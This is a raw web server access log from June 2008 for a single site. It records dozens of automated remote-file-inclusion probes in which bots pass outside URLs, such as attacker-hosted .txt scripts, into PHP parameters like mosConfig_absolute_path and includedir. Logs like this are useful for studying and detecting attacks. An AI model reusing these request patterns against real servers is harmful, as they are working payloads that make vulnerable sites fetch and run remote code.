81.3.4.113 - - [15/Jun/2008:17:00:36 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
81.3.4.113 - - [15/Jun/2008:17:00:37 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.62.54.120 - - [15/Jun/2008:17:01:03 -0700] "GET /logs/access_080121.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.62.54.120 - - [15/Jun/2008:17:01:03 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.62.54.120 - - [15/Jun/2008:17:01:03 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.71.79 - - [15/Jun/2008:17:03:00 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
82.194.71.79 - - [15/Jun/2008:17:03:00 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
212.241.217.240 - - [15/Jun/2008:17:03:20 -0700] "GET /logs/access_080127.log//administrator/components/com_facileforms/admin.facileforms.php?mosConfig_admin_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
91.43.95.7 - - [15/Jun/2008:17:03:34 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
91.43.95.7 - - [15/Jun/2008:17:03:35 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:04:10 -0700] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:04:10 -0700] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:04:11 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:04:11 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:04:11 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:04:11 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:04:25 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:04:26 -0700] "GET /modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:04:26 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:06:50 -0700] "GET /logs/access_080114.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:06:50 -0700] "GET /logs/access_080114.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:06:50 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:06:50 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:06:50 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:06:50 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:07:19 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:07:19 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:09:53 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:09:54 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:10:10 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:10:10 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:10:11 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:10:24 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:10:25 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:11:01 -0700] "GET /logs/access_071217.log/modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:11:02 -0700] "GET /modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:11:02 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:11:19 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:13:57 -0700] "GET /logs/access_080120.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
217.115.197.51 - - [15/Jun/2008:17:14:17 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://kkebi.haansoft.com/~nare/~udplink/tol???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:14:25 -0700] "GET /logs/access_071231.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:14:25 -0700] "GET /logs/access_071231.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:14:25 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:14:25 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:14:26 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:14:26 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:15:40 -0700] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:15:42 -0700] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:18:58 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.80.245.245 - - [15/Jun/2008:17:19:01 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
68.90.68.50 - - [15/Jun/2008:17:20:26 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:21:08 -0700] "GET /logs/access_070916.log/index1.php?a=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:21:08 -0700] "GET /index1.php?a=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:21:09 -0700] "GET /logs/index1.php?a=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:24:31 -0700] "GET /index1.php?a=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
206.221.179.200 - - [15/Jun/2008:17:26:12 -0700] "GET /logs/access_071210.log/index.php?body=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
206.221.179.200 - - [15/Jun/2008:17:26:12 -0700] "GET /index.php?body=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
206.221.179.200 - - [15/Jun/2008:17:26:12 -0700] "GET /logs/index.php?body=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
206.221.179.200 - - [15/Jun/2008:17:26:18 -0700] "GET /logs/access_071008.log/index.php?body=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:27:44 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:27:44 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:27:44 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
209.237.231.200 - - [15/Jun/2008:17:28:40 -0700] "GET /errors.php?error=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
209.237.231.200 - - [15/Jun/2008:17:28:40 -0700] "GET /logs/errors.php?error=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
160.99.12.231 - - [15/Jun/2008:17:29:14 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
80.32.194.164 - - [15/Jun/2008:17:29:14 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
160.99.12.231 - - [15/Jun/2008:17:29:15 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
160.99.12.231 - - [15/Jun/2008:17:29:15 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:31:03 -0700] "GET /logs/access_080120.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:31:04 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [15/Jun/2008:17:31:05 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:32:31 -0700] "GET /logs/access.log/ecrire.php?lang=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:32:31 -0700] "GET /logs/access.log/ecrire.php?lang=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:32:31 -0700] "GET /ecrire.php?lang=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:32:31 -0700] "GET /ecrire.php?lang=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:32:32 -0700] "GET /logs/ecrire.php?lang=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:32:32 -0700] "GET /logs/ecrire.php?lang=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.52.139.226 - - [15/Jun/2008:17:33:15 -0700] "GET /logs/access.log//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.139.226 - - [15/Jun/2008:17:33:15 -0700] "GET //admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.139.226 - - [15/Jun/2008:17:33:15 -0700] "GET /logs//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
203.172.184.72 - - [15/Jun/2008:17:33:17 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
203.172.184.72 - - [15/Jun/2008:17:33:17 -0700] "GET /logs/access_071210.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
203.172.184.72 - - [15/Jun/2008:17:33:17 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
80.40.126.43 - - [15/Jun/2008:17:34:27 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://piauibrlink.web44.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "summitcircle.com"
80.40.126.43 - - [15/Jun/2008:17:34:27 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://piauibrlink.web44.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "summitcircle.com"
80.40.126.43 - - [15/Jun/2008:17:34:36 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://piauibrlink.web44.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.summitcircle.com"
80.40.126.43 - - [15/Jun/2008:17:34:36 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://piauibrlink.web44.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.summitcircle.com"
74.52.139.226 - - [15/Jun/2008:17:35:03 -0700] "GET //admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
203.172.184.72 - - [15/Jun/2008:17:35:33 -0700] "GET /logs/access_071021.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
80.154.38.121 - - [15/Jun/2008:17:36:00 -0700] "GET /convert/mvcw.php?vwar_root=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:36:01 -0700] "GET /logs/access_071224.log/index.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:36:02 -0700] "GET /index.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:36:02 -0700] "GET /logs/index.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:36:09 -0700] "GET /?mosConfig_absolute_path=http://www.freewebtown.com/aaahckrj/rotest.txt? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:36:09 -0700] "GET /logs/?mosConfig_absolute_path=http://www.freewebtown.com/aaahckrj/rotest.txt? HTTP/1.1" 200 9661 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
67.15.114.74 - - [15/Jun/2008:17:36:11 -0700] "GET /logs/access.log//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.114.74 - - [15/Jun/2008:17:36:12 -0700] "GET /logs/access.log//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.114.74 - - [15/Jun/2008:17:36:12 -0700] "GET //admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.114.74 - - [15/Jun/2008:17:36:12 -0700] "GET /logs//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.114.74 - - [15/Jun/2008:17:36:13 -0700] "GET //admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.114.74 - - [15/Jun/2008:17:36:13 -0700] "GET /logs//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
80.154.38.121 - - [15/Jun/2008:17:36:28 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.227.251.172 - - [15/Jun/2008:17:37:11 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
207.44.238.63 - - [15/Jun/2008:17:37:23 -0700] "GET /logs/access.log//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
207.44.238.63 - - [15/Jun/2008:17:37:23 -0700] "GET /logs/access.log//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
207.44.238.63 - - [15/Jun/2008:17:37:23 -0700] "GET //admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
207.44.238.63 - - [15/Jun/2008:17:37:23 -0700] "GET //admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
207.44.238.63 - - [15/Jun/2008:17:37:24 -0700] "GET /logs//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
207.44.238.63 - - [15/Jun/2008:17:37:26 -0700] "GET /logs//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
80.154.38.121 - - [15/Jun/2008:17:37:27 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.254.214.2 - - [15/Jun/2008:17:38:00 -0700] "GET /logs/access.log/index.php?pag=http://jonial.110mb.com/Id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.254.214.2 - - [15/Jun/2008:17:38:01 -0700] "GET /index.php?pag=http://jonial.110mb.com/Id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.254.214.2 - - [15/Jun/2008:17:38:01 -0700] "GET /logs/index.php?pag=http://jonial.110mb.com/Id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.228.115.66 - - [15/Jun/2008:17:38:28 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://piauibrlink.web44.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
67.228.115.66 - - [15/Jun/2008:17:38:28 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://piauibrlink.web44.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
206.221.179.200 - - [15/Jun/2008:17:38:30 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.summitcircle.com"
206.221.179.200 - - [15/Jun/2008:17:38:30 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.summitcircle.com"
212.241.217.240 - - [15/Jun/2008:17:39:08 -0700] "GET /logs/access.log//administrator/components/com_facileforms/admin.facileforms.php?mosConfig_admin_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
67.195.98.240 - - [15/Jun/2008:17:39:17 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:39:34 -0700] "GET /logs/access_071231.log/index.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
